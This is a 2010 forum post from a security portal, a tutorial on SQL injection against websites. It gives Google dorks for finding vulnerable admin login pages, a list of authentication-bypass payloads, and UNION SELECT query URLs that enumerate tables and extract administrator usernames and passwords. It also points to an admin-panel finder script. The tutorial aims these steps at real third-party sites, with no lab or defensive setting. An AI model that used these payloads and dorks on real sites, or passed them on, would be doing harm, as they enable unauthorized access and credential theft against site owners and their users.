Waraxe IT Security Portal
Login or Register
October 15, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 70
Members: 0
Total: 70
Full disclosure
SEC Consult SA-20241009-0 :: Local Privilege Escalation via MSI installer in Palo Alto Networks GlobalProtect (CVE-2024-9473)
APPLE-SA-10-03-2024-1 iOS 18.0.1 and iPadOS 18.0.1
Some SIM / USIM card security (and ecosystem) info
SEC Consult SA-20240930-0 :: Local Privilege Escalation via MSI Installer in Nitro PDF Pro (CVE-2024-35288)
Backdoor.Win32.Benju.a / Unauthenticated Remote CommandExecution
Backdoor.Win32.Prorat.jz / Remote Stack Buffer Overflow (SEH)
Backdoor.Win32.Amatu.a / Remote Arbitrary File Write (RCE)
Backdoor.Win32.Agent.pw / Remote Stack Buffer Overflow (SEH)
Backdoor.Win32.Boiling / Remote Command Execution
Defense in depth -- the Microsoft way (part 88): a SINGLEcommand line shows about 20, 000 instances of CWE-73
SEC Consult SA-20240925-0 :: Uninstall Password Bypass in BlackBerry CylanceOPTICS Windows Installer Package (CVE-2024-35214)
Apple iOS 17.2.1 - Screen Time Passcode Retrieval (MitigationBypass)
CyberDanube Security Research 20240919-0 | Multiple Vulnerabilities in Netman204
Submit Exploit CVE-2024-42831
Stored XSS in "Edit Profile" - htmlyv2.9.9
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Sql injection -> Detailed Basic and Full SQL Injection Tutorial
Post new topicReply to topic View previous topic :: View next topic
Detailed Basic and Full SQL Injection Tutorial
PostPosted: Sun Feb 21, 2010 7:53 am Reply with quote
Ruyuk
Regular user
Regular user
Joined: Feb 21, 2010
Posts: 10
Location: Romania




Q: What is sql injection?

A: Injecting SQL queries into another database or using queries to get auth bypass as an admin.

Part 1 : Basic SQL injection

Gaining auth bypass on an admin account.
Most sites vulnerable to this are .asp
First we need to find a site, start by opening google.
Now we type our dork:
-"defenition of dork" 'a search entry for a certain type of site/exploit .ect"
There is a large number of google dork for basic sql injection.
Here is the best:

"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"

Now what to do once we get to our site.
the site should look something like this :

welcome to xxxxxxxxxx administrator panel
username :
password :

so what we do here is in the username we always type "Admin"
and for our password we type our SQL injection

here is a list of sql injections

' or '1'='1
' or 'x'='x
' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

'or'1=1'


There are many more but these are the best ones that i know of
and what this sql injection is doing : Confusing the shit out of the database until it gives you auth bypass.

So your input should look like this

Username: Admin
Password: 'or'1'='1

Also, remember, some sites don't use Admin as a log in, try using Administrator to.

So click submit and you'r in
NOTE: not all sites are vulnerable.


Part 2: Injecting SQL queries to extract the admin username and password

Ok so lets say we have a site :
http://www.xxxxx.com/index.php?catid=1
There is a list of dorks for sites like this

"inurl:index.php?catid="
"inurl:news.php?catid="
"inurl:index.php?id="
"inurl:news.php?id="
Or the best in my view,
"inurl:".php?catid=" site:xxx"


So once you have you'r site
http://www.xxxx.com/index.php?catid=1
now we add a ' to the end of the url
so the site is
http://www.xxxx.com/index.php?catid=1'
if there is an error of some sort then it is vulnerable
now we need to find the number of columns in the sql database
so we type:
http://www.xxxx.com/index.php?catid=1 order by 1-- "no error"
http://www.xxxx.com/index.php?catid=1 order by 2-- "no error"
http://www.xxxx.com/index.php?catid=1 order by 3-- "no error"
http://www.xxxx.com/index.php?catid=1 order by 4-- "no error"
http://www.xxxx.com/index.php?catid=1 order by 5-- "error"

So this database has 4 columns because we got an error on 5
on some databases there is 2 columns and on some 200 it varies
so once we have the column number.
we try the union function
http://www.xxxx.com/index.php?catid=1 union select 1,2,3,4-- "or whatever number of columns are in the database"
if you see some numbers like 1 2 3 4 on the screen or the column names
it might not show all numbers on the screen but the numbers displayed are the ones you can replace to extract info from the DB.
So now we need to info about the DB.
So lets say the numbers 2 and 4 showed up on the screen
So I will use my query on 2
http://www.xxxx.com/index.php?catid=1 union select 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4--
the DB type and version will pop up on the screen.
if the DB version is 4 or lower then to extract the password you will need these queries:
http://www.xxxx.com/index.php?catid=-1 UNION SELECT 1,concat(table_name,CHAR(5Cool,column_name,CHAR(5Cool,table_schema) from information_schema.columns where column_name like CHAR(37, 112, 97, 115, 37),3,4--
This should display the table containing the admin username and password
but if not then you will have to guess the table
so once you have your table "or not"
then type:
http://www.xxxx.com/index.php?catid=1 UNION SELECT 1,password,3,4 FROM admintablename--
Where it says admintablename type the table you found with concat(table_name,CHAR(5Cool,column_name,CHAR(5Cool,table_schema) from information_schema.columns where column_name like CHAR(37, 112, 97, 115, 37)-- or your guess
then once u have the right table name you should get the administrator password.
Then just do the same thing but type username instead of password
sometimes the password is hashed and you need to crack it.
then see if you can get the admin panel if you cant then try the admin panel finder script here http://www.darkc0de.com/c0de/perl/admin_1.2_.txt
now if the database is version 5 or up
type
http://www.xxxx.com/index.php?catid=-1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables--
and that will display a list of all the tables
once you have your table name
type the same thing as 4
http://www.xxxx.com/index.php?catid=1 UNION SELECT 1,password,3,4 FROM admintable--
then the same with username
but now if it doesnt work far all those things
just tootoo around with all the little catid=1 or catid=-1 or instead of -- put /* or even nothing
just play around with those
but sometimes we also need to use the version() or version@@
so sometimes UNION SELECT version (),password,3,4 FROM admintable--
or UNION SELECT version @@,password,3,4 FROM admintable--

Enjoy!
View user's profile Send private message
PostPosted: Fri Mar 12, 2010 10:48 am Reply with quote
Ruyuk
Regular user
Regular user
Joined: Feb 21, 2010
Posts: 10
Location: Romania




No comments? Sad
View user's profile Send private message
Detailed Basic and Full SQL Injection Tutorial
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.050 Seconds